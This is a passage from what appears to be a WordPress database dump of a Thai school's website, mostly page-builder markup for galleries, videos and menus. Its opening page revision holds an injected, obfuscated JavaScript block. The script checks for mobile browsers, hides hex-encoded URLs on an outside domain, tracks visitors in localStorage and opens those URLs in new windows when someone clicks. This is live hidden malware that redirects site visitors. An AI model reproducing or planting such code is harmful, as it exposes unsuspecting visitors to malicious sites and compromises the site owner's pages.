)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:33:59','2024-07-27 14:33:59','',19,'http://watprato.ssk.in.th/?p=77',0,'revision','',0),
(79,1,'2024-07-27 21:52:26','2024-07-27 14:52:26','','อนุบาลวัดพระโต','','inherit','open','closed','','%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95','','','2024-07-27 21:52:26','2024-07-27 14:52:26','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/อนุบาลวัดพระโต.mp4',0,'attachment','video/mp4',0),
(80,1,'2024-07-27 21:52:27','2024-07-27 14:52:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:video -->\n<figure class=\"wp-block-video\"><video autoplay controls loop src=\"blob:http://watprato.ssk.in.th/778bd54d-f5fe-4291-919e-bdbf5557245b\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 